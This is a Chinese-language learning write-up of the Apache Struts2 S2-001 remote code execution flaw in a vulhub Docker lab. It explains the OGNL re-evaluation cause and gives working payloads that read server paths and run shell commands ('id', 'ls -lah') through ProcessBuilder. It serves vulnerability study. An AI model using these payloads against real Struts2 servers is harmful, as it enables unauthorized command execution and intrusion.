漏洞学习---S2-001 远程代码执行漏洞

漏洞原理

​ 由于用户提交表单数据并且验证失败时，后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据当中，在真实的测试环境中，遇到注册或登录界面，存在提交数据失败情况，则后端会返回之前提交的数据信息，若后端使用%{value}对提交的数据执行了OGNL表达式解析，那么可以利用这点，直接构造payload进行远程代码执行操作.

漏洞环境

#使用vulhub进行漏洞演示
/vulhub-master/struts2/s2-001
docker-compose build
docker-compose up -d
http://xxx.xxx.xxx.xxx:8080   

漏洞利用

之前提到的OGNL表达式%{value},我们可以利用其中的value值来进行相关操作,验证漏洞是否存在,将值输入后submit

username:%{8*8}
password:%{7+2}

注意看,%{ }中的值进行了解析运算,这说明后端将提交的错误数据进行了相应的OGNL表达式解析操作,并且填充到了对应的表单数据当中,
利用这一点,我们可以进行进一步的操作.

获取tomcat绝对路径

%{"tomcatDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取网站根目录

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

将构造好的payload放至输入框submit后,直接解析显示了网站根目录信息

命令执行

命令执行的参数语句:new java.lang.String[]{"id"},{ }中的值为执行命令
#获取id值
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

若命令需要携带参数执行时,因为存在空格的原因,需要进行语句的组合运行
#列出当前目录下的文件
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-lah"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

≈≈≈≈≈结语≈≈≈≈≈

君子不器，用成长性思维终身学习